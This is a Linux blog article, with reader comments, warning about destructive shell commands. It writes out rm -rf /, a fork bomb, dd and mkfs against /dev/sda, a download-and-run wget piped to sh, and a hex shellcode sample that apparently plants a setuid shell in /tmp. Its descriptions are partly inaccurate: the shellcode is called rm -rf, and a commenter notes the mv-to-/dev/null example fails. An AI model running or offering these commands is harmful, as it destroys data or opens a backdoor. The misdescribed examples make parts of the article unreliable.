10 Most Dangerous Commands – You Should Never Execute on Linux

The command-line interface is a powerful and handy utility for administering a Linux system. It provides a fast and versatile way of running the system, especially when managing headless systems which do not have a graphical interface.

While useful in managing your system, the command line is fraught with risks. Running bad commands can cause harm and irrecoverable damage to your system. In this guide, we have compiled a list of some of the riskiest commands that you should not think of executing on your system.

1. rm -rf / Command

The rm command is a Linux command used to delete files and directories depending on the arguments used. However, extreme caution should be taken when using the rm command as a slight typo or mistake can result in unrecoverable system damage.

When executed as root with the -rf / option, the command recursively deletes all files and directories on your system starting from the root (/) which is the highest in the Linux File Hierarchy structure. In a nutshell, the rm -rf / command completely wipes out your system resulting in a broken and unrecoverable system.

The some of options used with the rm command are.

  • rm command in Linux is used to delete files.
  • rm -r command deletes the folder recursively, even the empty folder.
  • rm -f command removes ‘Read only File’ without asking.
  • rm -rf / : Force deletion of everything in the root directory.
  • rm -rf * : Force deletion of everything in the current directory/working directory.
  • rm -rf . : Force deletion of current folder and subfolders.

In fact, when you run the command as a regular user, you will get two warnings on the terminal.

Linux rm Command Example

To overcome accidental deletion of files by the ‘rm‘ command, create an alias of the ‘rm’ command as ‘rm -i’ in the “.bashrc” file, it will ask you to confirm every deletion.

2. :(){:|:&};: Command

The above is actually a fork bomb. It operates by creating a function called ':', which calls itself twice, once in the foreground and once in the background. The function executes repeatedly and in doing so, consumes all the system resources resulting in a system crash.

In fact, a fork bomb command is essentially a form of DoS (Denial-of-Service) attack. It is also referred to as the Wabbit or Rabbit virus. The worst part is that you don’t need to be root to launch this attack.

Thankfully, you can shield yourself from this attack by limiting the number of processes run by local users to around 4000.

You can do this by running the command:

$ ulimit -S -u 4000
 

You can later verify this using the command:

$ ulimit -u
 
Increase Open Files Limit in Linux

3. command > /dev/sda

Running a command followed by >/dev/sda overwrites the /dev/sda block on your hard drive. This block contains filesystem data and when overwritten, results in a damaged system that is irrecoverable.

4. mv folder /dev/null

Another harmful operation that you should not try is moving a directory or file to /dev/null. The /dev/null file is a special type of file known as the null device or “the black hole“. Anything that is moved to /dev/null is discarded and destroyed.

The following command moves all the contents of the user’s home directory to /dev/null, consequently discarding all the data contained in the user’s home directory

# mv /home/user/* /dev/null
 

5. wget http://malicious_source -O- | sh

The wget command is a command that downloads files from a web or file server. The above command downloads a script from a malicious source and then executes it.

6. mkfs.ext3 /dev/sda

The mkfs command creates a new filesystem (either ext2, ext3, ext4, etc) on a formatted storage device, in most cases a partition of a hard disk drive. Running the mkfs command on a partition wipes all the data stored in it.

While useful in formatting disk partitions, formatting an entire drive (such as mkfs.ext3 /dev/sda) crashes the system and leaves it in an irrecoverable state. This happens because it destroys all the system files alongside your personal data.

The command can also take other forms as shown below.

# mkfs.ext4 /dev/sda
 # mkfs.xfs /dev/sda
 # mkfs.btrfs /dev/sda
 

7. > file Command

The > file wipes out a file’s content and leaves it blank. It is synonymous with the cat /dev/null > file command. Caution should therefore be taken when using the redirection operators in a Linux system.

Below is a demonstration of how this command overwrites a text file. You can imagine the disaster that this command would cause when the file involved is a configuration file.

Redirection Operator Command Example

8. ^foo^bar

The ^foo^bar command is as dangerous as it is useful depending on how it is executed. While it allows you to edit previously executed commands and execute them again, it can be disastrous if you are not keen on the changes made to the commands before running them.

9. dd if=/dev/random of=/dev/sda

The above command wipes out the /dev/sda block and writes random junk data to the block. Your system would be left at an inconsistent and unrecoverable stage.

10. Chmod -R 777 /

While it may not immediately crash your Linux system, the chmod -R 777 / command recursively assigns all permissions (read, write and execute) to all files on your Linux system starting from the root.

This effectively exposes all critical configuration files and other files to all users and this poses a huge security risk to your system. Anyone with nefarious intentions can tinker with crucial files and easily break your system.

11. The Hidden Command

The below command is nothing but the first command above (rm -rf). Here the codes are hidden in hex so that an ignorant user may be fooled. Running the below code in your terminal will wipe your root partition.

This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Don’t compile/run codes from an unknown source.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
 release */
 = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
 “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
 “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
 “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
 “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
 “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
 “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
 “cp -p /bin/sh /tmp/.beyond; chmod 4755
 /tmp/.beyond;”;

Note: Don’t execute any of the above commands in your Linux terminal or shell or on your friend or school computer. If you want to test them, run them on a virtual machine.

Any inconsistency or data loss, due to the execution of the above command will break your system down for which, neither the Author of the article nor Tecmint is responsible.

That’s all for now. I will soon be here again with another interesting article you people will love to read. Till then Stay tuned and connected to Tecmint.

If you know any other such Dangerous Linux Commands and you would like us to add them to the list, please tell us via the comment section, and don’t forget to give your valuable feedback.

If you liked this article, then do subscribe to email alerts for Linux tutorials. If you have any questions or doubts? do ask for help in the comments section.

If You Appreciate What We Do Here On TecMint, You Should Consider:

TecMint is the fastest growing and most trusted community site for any kind of Linux Articles, Guides and Books on the web. Millions of people visit TecMint! to search or browse the thousands of published articles available FREELY to all.

If you like what you are reading, please consider buying us a coffee ( or 2 ) as a token of appreciation.

We are thankful for your never ending support.

41 thoughts on “10 Most Dangerous Commands – You Should Never Execute on Linux”

  1. As many note here, there is a lot of harmful commands that can make a lot of damage…

    Check out this project, intercept any risky patterns (default or defined by you) and prompt you a small challenge for double verification, kinda like a captcha for your terminal.

    https://github.com/kaplanelad/shellfirm

    Reply
  2. Today I wrote a command using a single * nothing more and the result was that the entire current directory was deleted!

    Fortunately, I add all backed up on Git bitbucket.

    Reply
  3. Hmm… Thanks for the article. But KJ is right: “I doubt this is going to work, you will get an error message like: mv: target ‘/dev/null’ is not a directory or mv: cannot overwrite non-directory ‘/dev/null’ with directory ‘folder’”

    It is impossible to move folders to /dev/null. One would expect the author of a guide like this to actually have tried the commands before writing an “expert” article about it… But is that just me being overly critical??? However, files can be moved there. But these files will overwrite /dev/null-content.

    Reply

Got something to say? Join the discussion. Cancel reply

Scroll back to top